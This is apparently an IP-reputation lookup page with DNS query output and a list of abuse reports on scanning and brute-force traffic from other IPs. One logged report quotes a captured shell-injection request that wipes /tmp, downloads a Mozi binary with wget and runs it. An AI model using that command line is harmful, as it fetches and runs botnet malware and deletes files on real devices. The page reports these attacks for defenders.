Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: United States

Internet Service Provider: Verizon

Hostname: unknown

Organization: MCI Communications Services, Inc. d/b/a Verizon Business

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 207.18.36.42
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 735
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;207.18.36.42.			IN	A

;; AUTHORITY SECTION:
.			2750	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019050800 1800 900 604800 86400

;; Query time: 0 msec
;; SERVER: 67.207.67.3#53(67.207.67.3)
;; WHEN: Wed May 08 20:11:10 +08 2019
;; MSG SIZE  rcvd: 116

Host info
Host 42.36.18.207.in-addr.arpa not found: 2(SERVFAIL)
Nslookup info:
;; Got SERVFAIL reply from 67.207.67.3, trying next server
Server:		67.207.67.2
Address:	67.207.67.2#53

** server can't find 42.36.18.207.in-addr.arpa: SERVFAIL

Related IP info:
Related comments:
IP Type Details Datetime
125.165.62.239 attackspam
Unauthorized connection attempt from IP address 125.165.62.239 on Port 445(SMB)
2020-02-24 19:52:41
218.92.0.168 attackbots
Feb 24 16:30:19 gw1 sshd[7380]: Failed password for root from 218.92.0.168 port 19344 ssh2
Feb 24 16:30:33 gw1 sshd[7380]: error: maximum authentication attempts exceeded for root from 218.92.0.168 port 19344 ssh2 [preauth]
...
2020-02-24 19:41:34
180.249.202.41 attackspam
Unauthorized connection attempt from IP address 180.249.202.41 on Port 445(SMB)
2020-02-24 19:29:08
188.168.82.51 attackbotsspam
1582532714 - 02/24/2020 09:25:14 Host: 188.168.82.51/188.168.82.51 Port: 445 TCP Blocked
2020-02-24 19:23:45
216.55.167.215 attackbots
Detected By Fail2ban
2020-02-24 19:28:37
14.161.28.187 attack
Unauthorized connection attempt from IP address 14.161.28.187 on Port 445(SMB)
2020-02-24 19:38:33
159.192.221.64 attack
Unauthorized connection attempt from IP address 159.192.221.64 on Port 445(SMB)
2020-02-24 19:27:51
118.99.96.180 attackspam
1582519529 - 02/24/2020 05:45:29 Host: 118.99.96.180/118.99.96.180 Port: 445 TCP Blocked
2020-02-24 19:34:57
34.93.238.77 attack
suspicious action Mon, 24 Feb 2020 01:45:00 -0300
2020-02-24 20:01:03
192.241.231.118 attack
02/23/2020-23:45:18.488894 192.241.231.118 Protocol: 17 GPL RPC portmap listing UDP 111
2020-02-24 19:45:26
217.11.29.10 attackspam
Unauthorized connection attempt from IP address 217.11.29.10 on Port 445(SMB)
2020-02-24 19:33:36
118.173.100.185 attack
Unauthorized connection attempt from IP address 118.173.100.185 on Port 445(SMB)
2020-02-24 19:51:08
113.137.21.112 attackbotsspam
C1,DEF GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
2020-02-24 19:46:25
125.162.123.201 attackbotsspam
Unauthorized connection attempt from IP address 125.162.123.201 on Port 445(SMB)
2020-02-24 19:57:57
202.111.185.11 attack
unauthorized connection attempt
2020-02-24 19:26:32

Recently Reported IPs

133.95.52.28 82.102.19.133 70.52.254.91 184.105.139.120
85.242.7.43 66.84.0.147 221.83.99.175 131.196.106.254
196.224.133.160 124.128.225.190 27.91.196.134 18.48.157.67
184.152.99.2 125.113.113.225 134.99.20.89 14.214.20.159
147.180.189.191 79.123.139.125 204.228.184.12 195.136.152.217